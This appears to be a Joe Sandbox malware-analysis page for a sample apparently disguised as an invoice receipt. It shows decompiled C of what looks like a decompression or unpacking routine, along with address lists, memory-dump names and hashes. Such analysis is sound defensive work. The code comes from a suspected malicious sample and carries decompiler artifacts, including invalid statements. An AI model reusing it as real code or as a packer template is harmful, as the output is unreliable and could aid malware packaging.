							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ead
0x00405eb4
0x00405eba
0x00405ec0
0x00000000
0x00405ec4
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efb
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f46
0x00405f49
0x00405f71
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f63
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fba
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fdc
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406022
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066ca
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406700
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x00406728
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x004060bc
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
